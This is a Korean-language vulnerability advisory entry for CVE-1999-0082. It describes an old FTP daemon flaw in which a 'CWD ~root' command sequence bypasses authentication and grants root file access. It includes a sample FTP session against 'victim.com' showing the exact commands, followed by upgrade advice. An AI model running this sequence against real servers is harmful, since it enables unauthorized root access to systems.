English

◀◁ 뒤로 취약점ID 16037 위험도 40 포트 21 프로토콜 TCP 분류 FTP 상세설명 해당 FTP 서버에 있는 CWD ~root 명령은 root 액세스를 허용한다. FTP 데몬의 매우 오래된 버전들은 원격지의 사용자들에게 "CWD ~root" 명령의 사용에 의한 인가되지 않은 액세스를 허용해 줄 수 있다. "CWD ~root" 명령을 포함하는 일련의 명령들을 줌으로써 공격자는 취약한 FTP 서버상에 인증을 우회하고 root 권한을 획득할 수 있으며 이를 통해 root 권한을 가지고 FTP Root 디렉토리 외부의 임의의 파일들을 액세스할 수 있다. 광범위하게 도용되어 온 이 취약점을 확인하기 위해서는 다음과 같이 할 수 있다: % ftp -n ftp> open victim.com Connected to victim.com 220 victim.com FTP server ready. Ftp> quote user ftp 331 Guest login ok, send ident as password. Ftp> quote cwd ~root 530 Please login with USER and PASS. Ftp> quote pass ftp@ 230 Guest login ok, access restrictions apply. Ftp> ls -al / (or whatever) * 참고 사이트: http://www.iss.net/security_center/static/54.php http://www.alw.nih.gov/Security/Docs/admin-guide-to-cracking.101.html * 영향을 미치는 플랫폼: FTP 모든 버전 해결책 취약한 FTP 대몬을 최신의 FTP 패키지로 대체하여야 한다. 또한 이 공격에 취약한 FTP 대몬들은 구 버전의 운영체제를 가지고 있을 것이다. 하드웨어가 지원해 주는 범위내에서 가장 최신의 운영체제로 업그레이드하는 방안도 고려하여야 한다. 관련 URL CVE-1999-0082 (CVE) 관련 URL (SecurityFocus) 관련 URL (ISS)